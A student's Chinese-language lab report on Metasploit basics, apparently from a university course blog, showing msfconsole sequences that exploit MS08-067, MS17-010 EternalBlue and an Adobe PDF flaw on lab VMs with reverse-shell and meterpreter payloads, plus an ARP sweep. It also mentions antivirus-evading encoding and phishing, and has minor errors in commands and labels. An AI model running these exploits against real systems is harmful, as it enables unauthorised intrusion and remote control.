20181334张怡杰《网络对抗技术》Exp6 msf基础应用

1.实践内容

1.1 主动攻击

ms08_067攻击  靶机windows 2000  攻击机kali

  • 查看windows2000的IP

  • 用KALI ping 靶机

可以ping通

  • msfconsole打开msf控制台
search ms08-067  //查看ms08-067具体信息

use exploit/windows/smb/ms08_067_netapi    //选择该漏洞
set payload generic/shell_reverse_tcp    //设置攻击的载荷
set RHOSTS 靶机IP    //设置靶机IP
set LHOSTS kali的IP    //设置攻击机IP
exploit    //进行攻击

1.2 针对浏览器的攻击

 ms17_010攻击  靶机windows 7  攻击机kali

  • msfconsole打开msf控制台
search ms17_010  //查看ms08-067具体信息

use exploit/windows/smb/ms17_010_eternalblue
show payloads    //显示可用载荷
set payload generic/shell_reverse_tcp  
set RHOST 192.168.130.130    //设置靶机IP
set LPORT 1334
set LHOST 192.168.130.131    //设置攻击机IP
exploit

关掉靶机防火墙

在靶机打开IE浏览器输入http://192.168.130.131:1334/    (http://kali的IP:监听端口)

 

攻击成功

1.3 针对客户端的攻击

adobe  靶机windows XP  攻击机kali

msfconsole    //进入控制台
search adobe    //进行查找
use windows/fileformat/adobe_cooltype_sing    //使用漏洞
info    //查看漏洞具体信息
set payload windows/meterpreter/bind_tcp    //选择攻击载荷
show options
set LPORT 1334
set RHOST 192.168.130.133
exploit

漏洞详细信息如下:

 

可以看到生成了msf.pdf

 

 使用管理员权限进入该文件夹所在的位置,使用cp命令将它复制到可操作的文件夹内,并放到靶机里。

use exploit/multi/handler  //进入监听模块
set payload windows/meterpreter/bind_tcp  //选择攻击载荷
show options  //查看详细信息
set RHOST 192.168.130.133  //设置靶机IP地址
set LPORT 1334  //设置端口号
exploit

在靶机打开msf.pdf,回到kali,进行exploit

1.4 成功应用任何一个辅助模块

 输入以下命令进入辅助模块

cd /usr/share/metasploit-framework/modules/auxiliary

ls查看辅助模块

我选择的是scanner下的discovery下的arp_sweep。

在TCP/IP网络环境中,一台主机在发送数据帧前需要使用ARP(Address Resolution Protocol,地址解析协议)将目标IP地址转换成MAC地址,这个转换过程是通过发送一个ARP请求来完成的。如IP为A的主机发送一个ARP请求获取IP为B的MAC地址,此时如果IP为B的主机存在,那么它会向A发出一个回应。因此,可以通过发送ARP请求的方式很容易地获取同一子网上的活跃主机情况,这种技术也称为ARP扫描。

sudo su
msfconsole
use auxiliary/scanner/discovery/arp_sweep  
set RHOSTS 192.168.130.0/24
set THREADS 50
run

从代码中可以看到,arp_sweep模块很快发现了192.168.130.0/24网段上拥有4台活跃主机,分别为192.168.130.1、192.168.130.2、192.168.130.133、192.168.130.254,其中前两个IP地址为宿主主机上模拟的虚拟网卡IP地址,第三个IP是我开的另一台虚拟机XP的IP地址。arp_sweep模块只能探测同一子网中的活跃主机,对于远程网络,可以使用更为强大的Nmap扫描器进行探测。

1.5 GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)

详见博客

2 问题回答

2.1 基础问题问答

用自己的话解释什么是exploit,payload,encode?

  • exploit:我感觉就是一个开始攻击的口令,输入exploit后就将载荷注入,开始攻击
  • payload:也就是载荷,也就是真正攻击靶机的代码
  • encode:是编码,能够防止杀软将shellcode查出来。

2.2 实践总结与体会

本次实验做了很多实战的攻击,攻击另外一台机子,于是在电脑里装了别的虚拟机,XP、win7、win2000等等,当看到真的攻击成功的时候,还是蛮震惊的,尤其是win7,我记得家里很久之前的台式机就是win7,有种很不安全的感觉,好在防火墙还是不错,但是这些技术、系统归根结底还不是我们的东西,国产操作系统还是很有必要的。

2.3 离实战还缺些什么技术或步骤

 很多漏洞都是很早之前的版本漏洞,但即使是最新版本有漏洞,我可能还是看不出来,我认为要实战得在漏洞容易出现的地方进行检查,以及一些边界检查看看能不能攻击到,还有一些攻击涉及到社会工程学攻击,不让客户下载点开文件是没法进行攻击的,可能得钓钓鱼。

posted on 2021-05-04 23:17  20181334张怡杰  阅读(60)  评论(0编辑  收藏  举报